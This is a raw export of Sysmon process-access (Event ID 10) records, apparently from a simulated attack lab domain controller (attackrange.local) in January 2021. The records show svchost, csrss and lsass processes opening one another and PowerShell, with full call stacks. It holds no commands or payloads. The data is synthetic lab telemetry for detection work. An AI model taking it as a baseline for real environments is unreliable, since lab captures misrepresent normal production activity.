13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.986{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.986{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 